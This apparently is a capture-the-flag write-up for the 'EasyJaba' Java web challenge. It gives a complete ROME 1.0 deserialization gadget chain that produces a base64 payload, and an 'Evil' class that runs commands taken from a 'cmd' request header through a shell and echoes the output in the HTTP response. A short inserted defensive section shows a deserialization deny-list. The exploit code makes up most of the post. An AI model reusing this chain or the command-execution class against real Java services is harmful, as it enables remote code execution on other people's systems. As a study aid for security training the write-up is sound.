Longyuan War "Epidemic" 2021 Cyber Security Competition: Web EasyJaba
2022-07-05 04:02:00 【Sk1y】
Looking at the source code, some classes are disabled.
(A note on decompilers: I have always used jd-gui, but with this challenge's attachment jd-gui does not show the disabled-class information, as shown below; the screenshot above was taken with jadx 1.4.)
The attachment also bundles rome 1.0, so the ROME 1.0 gadget chain is used.
In the usual chain, HashMap is used to trigger hashCode() and BadAttributeValueExpException is used to trigger toString(). Looking at this challenge's source, toString() is called on the deserialized object directly, so no entry class is needed.
The ROME chain, rewritten for this case:
package Rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

public class Rome2 {
    public static void unserialize(byte[] bytes) throws Exception {
        ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
        ObjectInputStream oin = new ObjectInputStream(bain);
        oin.readObject();
    }

    public static byte[] serialize(Object o) throws Exception {
        try (ByteArrayOutputStream baout = new ByteArrayOutputStream();
             ObjectOutputStream oout = new ObjectOutputStream(baout)) {
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }

    // Set a private field by reflection
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // Malicious bytecode
        byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
        // byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "sk1y"); // must not be null, otherwise null is returned
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{code});
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        // ToStringBean.toString() walks the getters of Templates, reaching getOutputProperties()
        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        // toStringBean.toString();
        byte[] aaa = serialize(toStringBean);
        System.out.println(Base64.getEncoder().encodeToString(aaa));
    }
}
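From the defending side, the chain above only works because the application deserializes untrusted bytes with a plain ObjectInputStream. As an added example that is not part of this writeup or the challenge, a lookahead stream that rejects the gadget classes before they are instantiated (SafeObjectInputStream and readTrusted are names assumed here):

```java
package Rome;

import java.io.*;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

// Added example (not from the writeup): reject the classes the ROME/TemplatesImpl
// chain depends on during class resolution, before any object is built.
public class SafeObjectInputStream extends ObjectInputStream {
    // Classes used by the chain shown above; a deny-list is only a stopgap, an
    // allow-list of the application's own expected classes is the stronger option.
    private static final Set<String> BLOCKED = Set.of(
        "com.sun.syndication.feed.impl.ToStringBean",
        "com.sun.syndication.feed.impl.EqualsBean",
        "com.sun.syndication.feed.impl.ObjectBean",
        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "javax.management.BadAttributeValueExpException");

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    // resolveClass runs for every class descriptor in the stream, so a rejected
    // class never reaches hashCode()/toString()/newTransformer().
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (BLOCKED.contains(name) || name.startsWith("com.sun.syndication.feed.impl.")) {
            throw new InvalidClassException(name, "class is not allowed to be deserialized");
        }
        return super.resolveClass(desc);
    }

    public static Object readTrusted(byte[] bytes) throws Exception {
        try (ObjectInputStream oin = new SafeObjectInputStream(new ByteArrayInputStream(bytes))) {
            return oin.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a harmless HashMap round-trips, a ToStringBean payload
        // would fail in resolveClass with InvalidClassException.
        Map<String, String> sample = new HashMap<>();
        sample.put("flag", "constructed-sample");
        ByteArrayOutputStream baout = new ByteArrayOutputStream();
        try (ObjectOutputStream oout = new ObjectOutputStream(baout)) {
            oout.writeObject(sample);
        }
        System.out.println(readTrusted(baout.toByteArray()));
    }
}
```

On Java 9 and later the same policy can be expressed with ObjectInputFilter.Config.createFilter(...) and ObjectInputStream.setObjectInputFilter(...), which also lets you cap stream depth and array sizes.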
No outbound network
Because the target cannot reach the outside network, the widely circulated Spring-based malicious class, which writes the result into the HTTP response instead of going out to the network, is used.
package Rome;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    public Evil() throws Exception {
        // Fetch the current Spring request/response through the context class loader
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String) getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK" : "UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        // Write the command output into the HTTP response body
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(), charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}
Compile it with javac to Evil.class and load that class through the chain above.
The final result:
According to fmyyy's writeup, Hashtable can replace HashMap to trigger hashCode() as well, so the original chain should still work (I did not manage to get it working; not sure what the problem was). The specific links are below.
Reference links